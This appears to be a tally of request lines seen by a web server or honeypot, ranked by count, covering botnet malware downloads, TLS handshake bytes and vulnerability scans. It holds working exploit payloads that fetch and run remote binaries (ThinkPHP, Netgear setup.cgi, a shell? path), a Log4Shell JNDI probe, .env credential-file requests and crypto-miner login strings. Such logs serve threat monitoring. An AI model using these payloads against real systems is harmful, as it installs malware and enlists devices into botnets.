88	3	GET /ee/armv4eb HTTP/1.1
89	3	GET /vv/armv5l HTTP/1.1
90	3	GET /tt/riscv32 HTTP/1.1
91	3	GET /vv/arc HTTP/1.1
92	3	GET /vv/sparc HTTP/1.1
93	3	GET /tt/mips64 HTTP/1.1
94	3	GET /bins/sora.x86 HTTP/1.1
95	3	GET /s/arm5 HTTP/1.1
96	3	GET /nshmpsl HTTP/1.1
97	3	GET /bins/sora.arm HTTP/1.1
98	3	GET /bins/sora.sh4 HTTP/1.1
99	3	GET /bins/sora.arm7 HTTP/1.1
100	3	GET /Media/Images/N3P3R87R.png HTTP/1.1
101	3	GET /Yboats.mips HTTP/1.1
102	3	GET /x0ox0ox0oxDefault/z0r0.x86 HTTP/1.1
103	3	GET /Yboats.i686 HTTP/1.1
104	3	GET /Yboats.arm6 HTTP/1.1
105	3	GET /Yboats.mpsl HTTP/1.1
106	3	GET /x0ox0ox0oxDefault/z0r0.arm HTTP/1.1
107	3	GET /x0ox0ox0oxDefault/z0r0.m68k HTTP/1.1
108	3	GET /nshsh4 HTTP/1.1
109	3	GET /s/mips HTTP/1.1
110	3	GET /x0ox0ox0oxDefault/z0r0.arm6 HTTP/1.1
111	3	GET /x0ox0ox0oxDefault/z0r0.i686 HTTP/1.1
112	3	GET /x0ox0ox0oxDefault/z0r0.spc HTTP/1.1
113	3	\x03\x00\x00\x13\x0E\xE0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x02\x00\x00\x00\x03\x00\x01\xD6
114	3	GET /x0ox0ox0oxDefault/z0r0.arc HTTP/1.1
115	3	GET /x0ox0ox0oxDefault/z0r0.sh4 HTTP/1.1
116	3	GET /x0ox0ox0oxDefault/z0r0.ppc HTTP/1.1
117	3	GET /x0ox0ox0oxDefault/z0r0.mips HTTP/1.1
118	3	GET /Yboats.sh4 HTTP/1.1
119	3	GET /Yboats.ppc HTTP/1.1
120	3	GET /vv/armv6l HTTP/1.1
121	3	GET /Yboats.arc HTTP/1.1
122	3	GET /hiddenbin/boatnet.m68k HTTP/1.1
123	2	GET /splmips HTTP/1.1
124	2	GET /nabarm5 HTTP/1.1
125	2	GET /jklsh4 HTTP/1.1
126	2	GET /nabx86 HTTP/1.1
127	2	GET /nabmips HTTP/1.1
128	2	GET /nabmpsl HTTP/1.1
129	2	GET /splarm7 HTTP/1.1
130	2	GET /splarm5 HTTP/1.1
131	2	GET /dniapi/userInfos HTTP/1.1
132	2	GET /nshmips HTTP/1.1
133	2	GET /nsharm HTTP/1.1
134	2	GET /nshppc HTTP/1.1
135	2	GET /nsharm5 HTTP/1.1
136	2	GET /localhost/.env HTTP/1.1
137	2	GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
138	2	GET /nshkarm6 HTTP/1.1
139	2	GET /hidakibest.mpsl HTTP/1.1
140	2	GET /hidakibest.arm6 HTTP/1.1
141	2	GET /hidakibest.x86 HTTP/1.1
142	2	GET /hidakibest.arm5 HTTP/1.1
143	2	GET /hidakibest.ppc HTTP/1.1
144	2	GET /hidakibest.sparc HTTP/1.1
145	2	GET /mipsel HTTP/1.1
146	2	GET /m-6.8-k.Sakura HTTP/1.1
147	2	GET /main_sh4 HTTP/1.1
148	2	GET /main_ppc HTTP/1.1
149	2	GET /sparc HTTP/1.1
150	2	GET /main_arm5 HTTP/1.1
151	2	GET /gif HTTP/1.1
152	2	GET /main_x86 HTTP/1.1
153	2	GET /main_mpsl HTTP/1.1
154	2	GET /yakuza.x86 HTTP/1.1
155	2	GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.129.101/jaws;chmod+777+/tmp/jaws;sh+/tmp/jaws HTTP/1.1
156	2	GET /Mozi.m HTTP/1.1
157	2	GET /miner HTTP/1.1
158	2	GET /bins/arm6 HTTP/1.1
159	2	GET /bins/mips HTTP/1.1
160	2	GET /yakuza.arm4 HTTP/1.1
161	2	GET /t/mips HTTP/1.1
162	2	GET /verbindungstester.js HTTP/1.1
163	2	GET /main_mips HTTP/1.1
164	2	GET /LjEZs/uYtea.sh4 HTTP/1.1
165	2	GET /LjEZs/uYtea.arc HTTP/1.1
166	2	GET /LjEZs/uYtea.ppc HTTP/1.1
167	2	GET /LjEZs/uYtea.m68k HTTP/1.1
168	2	GET /LjEZs/uYtea.mips HTTP/1.1
169	2	GET /powerpc.nn HTTP/1.1
170	2	GET /yakuza.m68k HTTP/1.1
171	2	GET /LjEZs/uYtea.arm7 HTTP/1.1
172	2	GET /LjEZs/uYtea.arm5 HTTP/1.1
173	2	GET /nabsh4 HTTP/1.1
174	2	GET /splx86 HTTP/1.1
175	2	GET /zerarm7 HTTP/1.1
176	2	GET /arm HTTP/1.1
177	2	GET /arc HTTP/1.1
178	2	GET /arm6 HTTP/1.1
179	2	GET /sh4 HTTP/1.1
180	2	GET /t/arm5 HTTP/1.1
181	2	GET /mpsl HTTP/1.1
182	2	GET /t/arm6 HTTP/1.1
183	2	GET /t/mpsl HTTP/1.1
184	2	GET /t/sh4 HTTP/1.1
185	2	GET /t/arm HTTP/1.1
186	2	GET /bins/arc HTTP/1.1
187	2	GET /bins/arm HTTP/1.1
188	2	GET /sshd HTTP/1.1
189	2	GET /zd/arm6 HTTP/1.1
190	2	GET /websso/SAML2/SSO/vsphere.local?SAMLRequest HTTP/1.1
191	2	POST /mifs/j_spring_security_check HTTP/1.1
192	2	GET /x86_64 HTTP/1.1
193	2	GET /zd/arm7 HTTP/1.1
194	2	GET /zd/arm HTTP/1.1
195	2	GET /zd/ppc HTTP/1.1
196	2	GET /x86 HTTP/1.1
197	2	GET /tmips HTTP/1.1
198	2	POST /api/login HTTP/1.1
199	2	GET /bins/arm5 HTTP/1.1
200	2	GET /zd/m68k HTTP/1.1
201	2	GET /zd/spc HTTP/1.1
202	2	GET /ee/armv7l HTTP/1.1
203	2	GET /tt/armv7l HTTP/1.1
204	2	GET /ee/armv4l HTTP/1.1
205	2	GET /vv/mipsel HTTP/1.1
206	2	GET /tt/armv4eb HTTP/1.1
207	2	GET /tt/armv6l HTTP/1.1
208	2	GET /tt/arc HTTP/1.1
209	2	GET /vv/armv4l HTTP/1.1
210	2	GET /tt/mipsel HTTP/1.1
211	2	POST /wp-admin/admin-ajax.php HTTP/1.1
212	2	GET /vv/armv7l HTTP/1.1
213	2	GET /yakuza.mips HTTP/1.1
214	2	GET /bins/m68k HTTP/1.1
215	2	GET /bins/arm7 HTTP/1.1
216	2	GET /Yboats.m68k HTTP/1.1
217	2	GET /x0ox0ox0oxDefault/z0r0.arm7 HTTP/1.1
218	2	GET /zd/arm5 HTTP/1.1
219	2	GET /Yboats.x86 HTTP/1.1
220	2	GET /?x=${jndi:ldap://${:-131}${:-904}.${hostName}.uri.cvdlqtvdueihu608mbb0y7ayby6o18icu.oast.site/a} HTTP/1.1
221	2	GET /i HTTP/1.1
222	2	GET /zd/aarch64 HTTP/1.1
223	2	GET /x0ox0ox0oxDefault/z0r0.arm5 HTTP/1.1
224	2	\x04\x01\x01\xBBh\x156[\x00
225	2	POST /cgi-bin/luci/;stok=/domain_login?form=dlogin HTTP/1.1
226	2	GET /Yboats.spc HTTP/1.1
227	2	GET /s/arm7 HTTP/1.1
228	2	GET /s/arm6 HTTP/1.1
229	2	GET /s/mipsel HTTP/1.1
230	2	GET /arm4 HTTP/1.1
231	2	GET /Mozi.a HTTP/1.1
232	2	GET /nshksh4 HTTP/1.1
233	2	GET /hmips HTTP/1.1
234	1	\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03;\xEC~\xEB\x93\xA6V-t\xC9\xC6b-\xA31\xDE\xDC=0\x8F’n\x93\x127\xA4\xC2
235	1	c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00OISYSNEC\x00\x00\x00\x00
236	1	\x00\x0E\x08]E\xE8\xF9\x17\xAF\x83\xDA\x00\x00\x00\x00\x00
237	1	\x00\x0E8]E\xE8\xF9\x17\xAF\x83\xDA\x00\x00\x00\x00\x00
238	1	GET /getcfg.php HTTP/1.1
239	1	GET /proc/.env HTTP/1.1
240	1	GET /run/.env HTTP/1.1
241	1	GET /boot/.env HTTP/1.1
242	1	GET /nmaplowercheck1742501260 HTTP/1.1
243	1	GET /pSd5 HTTP/1.1
244	1	\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03\x8B\x81\xF3\xFE\xCB\x03#\xD0\x0B\x1CX)\x19\xD2\xC3A\x8C\x8E\xD0\xCA\x9C\x0F\xE3\xE2\xDF\xF4\x16w/\xD3\x88\x03 \xF1\xDF\xAD\xFC{zW\xA67\xE2\xD8\xD2R\xDBl\xCE=(\xDF\x83\xC6=\x22\x11\xB3\xBB\xC2\xCD\xD9\x10\xFFO\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
245	1	\x16\x03\x03\x01\xA6\x01\x00\x01\xA2\x03\x03\xA6\x83\x06\xFD\x1B\x1E4s\xE9\x87\xC8\xFF\x00Ij\x9F\x03\xF3\xD3*!\x7F\xED\xB9;1?\xF8\xF9q\xA9\xD0 r\xDA\xFF6\xCF\x06
246	1	MGLNDD_88.151.192.19_80
247	1	GET /Nmap/folder/check1742501260 HTTP/1.1
248	1	GET /api/v2/about HTTP/1.1
249	1	GET /NmapUpperCheck1742501260 HTTP/1.1
250	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xBEw\xAC\x11\x96\xF6_#\x89?\xE0\x0F=\x97\xACT,\x1F\x1Cd\x03\xA5\x11\xF9\x9F\x85\x0F\xFF\xF6\x5C\xDDL\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
251	1	\x16\x03\x01\x00\x8C\x01\x00\x00\x88\x03\x03\xFCC\xE1\xCD\x22\x01\x1C\x07\xA0\xAA&\xC9\xD7\xB0\xDC\xCC\xA5\xEA\xB0P=.\xC4\xD4.m\x18\x86\x95)\x17\x1C\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
252	1	\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x03\xAFBUxpj\xBC\xC3\xC2J\x8B\xA3\x1D\x03rvW\xF5\x98\x83\xE5\xA1s\xE9\x8C\xE7\x0F\xF5d\xF2\xDBM \xBDA\x97d\xA8\xA4\xCCo\x07\xD2D\xAC\x80\xFE\xB1\xEEM*\x0C;\xB5a\x7F\xF9\x08\xDE\x0ChgeC\x04\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
253	1	\x16\x03\x01\x00\xEA\x01\x00\x00\xE6\x03\x034\xF3\xF0\xE0\xD3\xDBB\xB5=\xB7MY\x8B\x95]\x80\xDA\xB4lT`\x13\xB2\x7F\xC5\xD9wd\x9C\xEEL8 \xE9\xF1n\xA3`\x8B\x83N\xAC\xDD\xD2\xC9c\x8Af\x01G\xA2]\x09n\x1D\xC6\x1C\xEF}\xE3\xD0b\xFB\x03\xCC\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
254	1	\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03T\xC7\x98)2\x1ACZnQ\xF9\xE9\xF9~\xF9s\x81\x0E\xDA\x96\x0Cr@W\x09\x88\x8C\x05a\xA6\xEE\xBC x>\x0E\xCE\x90Z\x03\xA7\xE4P
255	1	GET /fAEq HTTP/1.1
256	1	GET /b5Sr HTTP/1.1
257	1	GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1 HTTP/1.1
258	1	GET /r-seenet/index.php HTTP/1.1
259	1	GET /versions HTTP/1.1
260	1	GET /allversions HTTP/1.1
261	1	GET /login/login.html HTTP/1.1
262	1	GET /tos/index.php?user/login HTTP/1.1
263	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xA5(3\xEEB\xB2V\xD9\x16\xE5\xB5\xCEwf\xF2\xA9\x1F5\xE1\xED_\x12\x98v\xBB\xEFP;Q\xBF`e \xDAhL\xF8\xC5\xFE\x0F\xE5\xB8\x0C=\xB9\x88XY3\x88\xFD\xBA\xD2\xFC\xBDY\x99\x17\xCFH&\xDB\x22\x10\x06\x00\x9C\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/\xC0,\xC00\x00\xA3\x00\x9F\xCC\xA9\xCC\xA8\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xA3\xC0\x9F\xC0]\xC0a\xC0W\xC0S\xC0+\xC0/\x00\xA2\x00\x9E\xC0\xAE\xC0\xAC\xC0\xA2\xC0\x9E\xC0\x5C\xC0`\xC0V\xC0R\xC0$\xC0(\x00k\x00j\xC0s\xC0w\x00\xC4\x00\xC3\xC0#\xC0’\x00g\x00@\xC0r\xC0v\x00\xBE\x00\xBD\xC0
264	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xEB\x7F\x07\xC2\x85Q\x13\x13\xFE\xF7\x93O\xE3\xBC\x1D\x5C\xF9\xE5\x90\x07^t\xF0\xD6\xC2\xB6\x10\xE7\x8A\xA5fk\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
265	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xC5i2\xE6u\x1Em\xDEy)%\xD9<9!\xDE\xD5\x87\x8E\x92^\x9E)?\xAC\x1D\xC6\x17\xEE;‘N \x90\xCD
266	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xA6\xEB\xF5r\x1B\x04\x15\x06*\xE4\xD5\x99>\xB2y\x86\xAA’\xF1\x0C\xC0\xF4\xA0}\xB9\xA3\x16\x03\xAAq\x83.\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
267	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xCEhd\x91B\x03\xBCO\xE3e\xA6J\x18\xC0?\xD9\xEE\x88\xA5\xC1\xB3\x03S\xA9\xC4X\xCF\x9C\xF8\xD7\x903\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
268	1	\x16\x03\x01\x00\x8C\x01\x00\x00\x88\x03\x03E[\xD0$\x98x\x1B\xCC\xD3C\x8B=\xA6w\x9Cp\xDB\xF8%V\x10\xA4\xC2Y\xF7.1\xEA\xAFL\xE6\x90\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
269	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x9D#\x04\xC8\xEA\x84b\x09\xD3Q\xA57\xEBK\xBB\x0B=\x1A\xF0\x8C\x91yM\xE1\x7F\x1A\xDC\x8CM\x0Bj\x1D\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
270	1	GET /Module1/js/Module_b1827afbcecf98cd0e40b9ee2187b3ac.js HTTP/1.1
271	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xE4\x0C\xCBV\x88{\x1AO5*\xDE\xFE\xFD\xA9\xAF\xD0\x19\xAFHn;\xD38\x1F\xC3\xF3\x89m\xECo\xDC\xB4 \x85\xED\x9C1n\xE9\xF3\xE5\x9F\x96J\x11zU\xC2}\xC4\xCC\x1FJ\xC1\xB6\x22\x1BT\xF3\x8F\x0Cc\x85\x84\xF2\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
272	1	GET /Module1/js/Module_721fbc57271715f9b2d038cdff508ce6.js HTTP/1.1
273	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xE6r\xFEi\xFA\x80\x0E\x86\xE0\x9C\xB5\x9E:(\x9B\x1B\xC1n\x01\xA5\xFC\x81\x191d\xEC6\xBA0R\x9E#\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
274	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xCFg\xAE\xC2\xFD\xDB\xAB\xFEbXF5xF\xAD\xBE\xC6\xCC\x91\x83\xB5m\xD6\xEA\x85pp\xCB\x8F\xA9\xC50\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
275	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xCAEC\x0FhO\x9ARh\x12\x19\x94lt\xCF\x96<\xFEG\x9F\x88\x0C\x9EH\x82T\xFB\xECW\x86\xD1\x00\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
276	1	OPTIONS rtsp://xxx.xxx.xxx.xxx:80 RTSP/1.0
277	1	GET /level/15/exec/-/sh/run/CR HTTP/1.1
278	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xD7S\xB4\xB8\x8D^\xD4\xF8\xE3[\xC1F\xDF\x17\x19K\x0B\xAE\xDC
279	1	\x16\x03\x01\x00\xC6\x01\x00\x00\xC2\x03\x03{%\x81\xF8\xCE\xF9\xFB?\xAB\x9D\xD8;\xA5\xFF\xB1_E\x0F\xF9\x87\xD8\x12cz\xEA\xA0\xB5\xEF\x84\xCE[~\x00\x00P\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
280	1	\x16\x03\x01\x01$\x01\x00\x01 \x03\x03\xCCYw-\xE4\xB3l
281	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x9Dc
282	1	GET /Odin/http/call1742473322 HTTP/1.1
283	1	GET /OdinHttpCall1742473322 HTTP/1.1
284	1	GET /odinhttpcall1742473322 HTTP/1.1
285	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03q\xDA\x7F\x1D\xFC4\xCEr\x8D\x84\xC7\x98\xA3\xC2\xB2\xA0\xEFg\xE0C\xD4\xF3
286	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\x06\xF7L\xE9\xB7@\xA1\xCB\xE6\xC5\xE6\xF6\xF1\x9Bx\x1C@\x18\xF2\x9A\xA5\xFD\x15P\x0C+\xA3\xB1\x1E\x08\x06\x95\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
287	1	\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03]\xB5\xB0\x9F/\xB6;\x85\xC0\xFB\x8FT\xFB\xDC\xF2j=\x04\xD05\x97\x8Ep\x12\x08\xAFi\x00\x1A\xC7\xAC\xDF \xDE+f\xD7`\xA5\xD9
288	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03s0\xC6\xC0\x0EW\xA3\x9A\xB7^\xCCM\xBB\xB9w
289	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x05.\xC9^\xBB\xDD\x1F\x1B\xFB\xB5\x99\xE8\xB0X\xFF\xD9\x03\x0F\xDB\xEAn\x122\xE2l\x1F\x1A<s\xE0\xA6\x13 u\xAA\xFD*\x99\x8E\x86\xF7.\x0B@\x81\x98y\x14\xCB\xB3\xF9\xC0\x83\xF6\xE9\xA4+\xBE\xD6w\x04d\xAC\xE8\x03\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
290	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03YH\x82Q\xAA\x89\xA8]\x03\xAC\xEDvu\x0B\x03\xD4\xF0\xF4\xA4\x9E\xA3(\x5C]\xF8t/\x1F\xE9z\x13{\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
291	1	GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&232ZF=33ELO HTTP/1.1
292	1	GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&3G3SF=0ZT25 HTTP/1.1
293	1	GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&BGT5A=AUA0J HTTP/1.1
294	1	GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&HO8DN=XJSPA HTTP/1.1
295	1	GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&3PZTR=1XD09 HTTP/1.1
296	1	GET /VERM/VERM_AJAX_functions.php?function=log_custom_report&QBNUD=4UK23 HTTP/1.1
297	1	\x16\x03\x01\x05\xC4\x01\x00\x05\xC0\x03\x03a\x93\xDC\x95\xB9\xFC\xCA\x0B\xEB\xE2\x9A,\x85i\xE4\x19\x06
298	1	POST /api/user/binLookup HTTP/1.1
299	1	GET /api/bin/440393 HTTP/1.1
300	1	\x16\x03\x01\x00\x8A\x01\x00\x00\x86\x03\x03lO4\x89\x8E\xC0\xB6\x06
301	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xEBY\xEB\xFEq\x97\xB6E\x9BM1z\x85\x1B`=\xBD\xB5\xAD\xA8\xC4\xE5p\x93\xC8\x06<\xAANe\xD6\xD1\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
302	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x87\xE6\x8F0P\x04@\xDA=#\xDB\x88\x19\xBB\x8EN\xD2\xD2\x9FN\x93w\x06=\xCD\xB8\xBA\xEF\xA2\xEF2\xB0\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
303	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\x90\x1D:k\xBA\x9Dh\xA2t\x88\x11p\xEA\xEE\x87\xB9Z\x16\xE4\xFF\x09\x1A\x07\xAE\x0F\xFE\x82#p\x8E\xDC\xB3 \xCEs~\xBEh\xC0\xB7k\xC4\x84\xEAXy_\x9E\x06s&\x1C\x9D6M\xE8\xE8\x1BCz\xF3\xF8\xF3q\xE9\x00>\x13\x02\x13\x03\x13\x01\xC0,\xC00\x00\x9F\xCC\xA9\xCC\xA8\xCC\xAA\xC0+\xC0/\x00\x9E\xC0$\xC0(\x00k\xC0#\xC0’\x00g\xC0
304	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03x:]\x19\x8A&\xC6\xA2E\xDB\x03)a\x8F\xA8\xF8\x7F\xE8O^\xAD\xBFe\xE3\x83_\xCFC\xD1\x11\xFA\xC8 \xCA$=\x1FFkM\xB9?\xC6\x85\x1A5:\x9D\xBC\x14\x1B\xD3\xAC\x04g\xEB\xCB?\xAF\x18\xEC\xBC\xB6\xB0\xEE\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
305	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03e\xAE\x5C\xDA\x9E\xD1\xE8f\x96)e\x95t\x1E\xD0{\xEFI\xDB\xDE\x1E\x5C\x16ps\xFE\x1D\x8E\xAD9’\x0F\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
306	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xDB\xD1\x1C\xB0\xC8-w\x18jO\xAF\x9F*J\x9A{.\xD7oI\xD3c\xF2\xAA\x8C\xA4\xDE\xB1&\xE28\x98\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
307	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x83\x1F\xEF’\xEFg\x9A\x01\xBA$\x18\xA4\x1B\xB1\xCE]\xAA\x22\x0E#I:x\xACr\xA5O\xC6\xDDx\x19&\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
308	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xAD\x1D$Ar\xF7\xEF\xA0E\xD0+\x0C\xF7@)\x9Dr\x139\xA1\x84i\x86q\xB3V\xCF\xCAB\xCE\xE5j\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
309	1	\x00\x0E8\xC6*$\xFE\xD3\xE9\x87\xAE\x00\x00\x00\x00\x00
310	1	\x00\x0E\x08\xC6*$\xFE\xD3\xE9\x87\xAE\x00\x00\x00\x00\x00
311	1	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.48:10756/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
312	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03uMj\xD7`\x94\x1C\x5C\xA0\xB0\xEA\x00\xC7Y\x06\xB3\xB2)i\xBB\xAF\xFE0\x88\xBCt\xCD\xAE%a_\x8F \xCB\xE7\x12#\xA3\x0BZ\x16g\x18\xAE\xC1<\xBE+8.Y\xE4Q\xC2$$\xA9\x5C\xDF}
313	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03w\xC7<\xF3\x12\xD31e`\xB6\x86\x98\xDA\x96\xF7X\x9A\xFB\xA9\xA7\xFEO\xEDb\xAA\xA2\xCE\x95\xB6\xF3D\x91 \xBE\xFA\xED’vB\xDE\x19\xB0\x11\xEF7\x87\x1D\x8E9\xBD\xD0\xF0E\xBD\xAF\x90\xE1L\xA9:\xA1\xB3\xED\x9Fh\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
314	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xEE\xA2z\xAE$\xA3’\x0EA\x81A\x17Q1\x01\xAF\x13n\xFDl \xBF\x85\xE6\x09Q\xDE\xE2\xD1oT\x5C :\x93\x86f\x96\x1F\xB4&\xD7\x8D\xACgL\x94\xD2\x9CF\x1D_\xACW\x97\x04{lW2p#\xF7O\xEF\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
315	1	\x16\x03\x01\x00\x8D\x01\x00\x00\x89\x03\x03\xCFe9]\xE6\xB1u)\xDF\x83EV(\xC0\xD8
316	1	GET http://www.msftncsi.com/ncsi.txt HTTP/1.1
317	1	{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2245oSjnnvS9AAuQYEdkoCvUdUwWWrUhogLhvoW2qJrUNx6P3vYsUthyw7bysu56Nd25cJRxBJ9XcaHbPyyq9x7KEuB85dRzn\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
318	1	{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x4da47909d8e5dfae65cbe8bb3735ea3ce37478cf\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
319	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03}\x1C\x8F\xFC\xABX\xF1\xA4L\x90\x05@\x5C\x14\xF4\x07\xFF5\xDC.
320	1	\x16\x03\x01\x00\xAC\x01\x00\x00\xA8\x03\x03fo\xF6`\xB2\x91U\x87\x03\x8C\xA0~\xA7\x04\xE0\xBF
321	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xBF\xD1\xEF\xBEKkLWGd]F\x07\x80
322	1	\x16\x03\x01\x00\xE2\x01\x00\x00\xDE\x03\x03>e\x99\x06\xFDV\xB4@\xD0\xC1\xF6\xF5o\x06\xCA?\xD9\xC7\xADe\xDB\x88\x06m0u\x9C\x82\x07\x91\xBAu \xB1\x92;\x83\x1F’\x15{F\x12\xEE\xA6\xFB\x92\xB0\x9B’]\x80\x13I\xF7$F\xF0Oke!\x00](\x00\x1A\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
323	1	GET /v1/models HTTP/1.1
